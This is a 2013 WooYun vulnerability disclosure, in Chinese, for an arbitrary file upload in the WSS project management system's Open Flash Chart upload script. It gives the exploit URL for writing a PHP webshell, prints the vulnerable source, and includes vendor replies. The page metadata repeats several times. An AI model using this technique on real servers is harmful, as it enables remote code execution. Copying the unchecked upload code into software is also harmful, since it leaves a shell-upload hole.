WSS 项目管理系统 Post get shell | WooYun-2013-18928

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2013-18928

漏洞标题： WSS 项目管理系统 Post get shell

漏洞作者： hfy

提交时间： 2013-02-20 10:16

公开时间： 2013-02-20 10:16

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank： 10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

3人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-02-20：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-02-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

POST 数据
漏洞文件执行任意后缀文件保存

详细说明：

漏洞文件/chart/php-ofc-library/ofc_upload_image.php

利用：

/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名

Post任意数据

保存位置http://localhost/chart/tmp-upload-images/hfy.php

最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~

code 区域

<?php





//


// In Open Flash Chart -> save_image debug mode, you


// will see the 'echo' text in a new window.


//





/*


 


print_r( $_GET );


print_r( $_POST );


print_r( $_FILES );





print_r( $GLOBALS );


print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );





*/








// default path for the image to be stored //


$default_path = '../tmp-upload-images/';





if (!file_exists($default_path)) mkdir($default_path, 0777, true);





// full path to the saved image including filename //


$destination = $default_path . basename( $_GET[ 'name' ] ); 





echo 'Saving your image to: '. $destination;


// print_r( $_POST );


// print_r( $_SERVER );


// echo $HTTP_RAW_POST_DATA;





//


// POST data is usually string data, but we are passing a RAW .png


// so PHP is a bit confused and $_POST is empty. But it has saved


// the raw bits into $HTTP_RAW_POST_DATA


//





$jfh = fopen($destination, 'w') or die("can't open file");


fwrite($jfh, $HTTP_RAW_POST_DATA);


fclose($jfh);





//


// LOOK:


//


exit();








//


// PHP5:


//








// default path for the image to be stored //


$default_path = 'tmp-upload-images/';





if (!file_exists($default_path)) mkdir($default_path, 0777, true);





// full path to the saved image including filename //


$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); 





// move the image into the specified directory //


if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {


    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";


} else {


    echo "FILE UPLOAD FAILED";


}








?>

漏洞证明：

修复方案：

这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞

版权声明：转载请注明来源 hfy@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

2013-02-25 11:16 | WSS Lab(乌云厂商)
1

感谢反馈，该漏洞已修复。

1# 回复此人
2013-02-26 00:55 | hfy ( 路人 | Rank:5 漏洞数:3 | 打了个狗~)
1

@WSS Lab 来个rank?

2# 回复此人
2013-02-27 10:11 | WSS Lab(乌云厂商)
1

@hfy 这个漏洞没有关联到我们名下，所以我们处理不了，不过可以送您个礼物。您可以把联系方式发给我们。

3# 回复此人

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2013-18928

漏洞标题： WSS 项目管理系统 Post get shell

相关厂商： http://www.wssys.net/zh-CN/

漏洞作者： hfy

提交时间： 2013-02-20 10:16

公开时间： 2013-02-20 10:16

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank： 10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

3人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hfy@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(少于3人评价):

登陆后才能进行评分

评价

WooYun.org

漏洞概要 关注数(8) 关注此漏洞

缺陷编号： WooYun-2013-18928

漏洞标题： WSS 项目管理系统 Post get shell

相关厂商： http://www.wssys.net/zh-CN/

漏洞作者： hfy

提交时间： 2013-02-20 10:16

公开时间： 2013-02-20 10:16

漏洞类型： 文件上传导致任意代码执行

危害等级： 高

自评Rank： 10

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： 无

3人收藏 收藏 var token=""; var id="18928"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hfy@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(少于3人评价): 登陆后才能进行评分

评价

漏洞概要关注数(8) 关注此漏洞

漏洞类型：文件上传导致任意代码执行

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：无

3人收藏收藏
分享漏洞：

漏洞评价(少于3人评价):

登陆后才能进行评分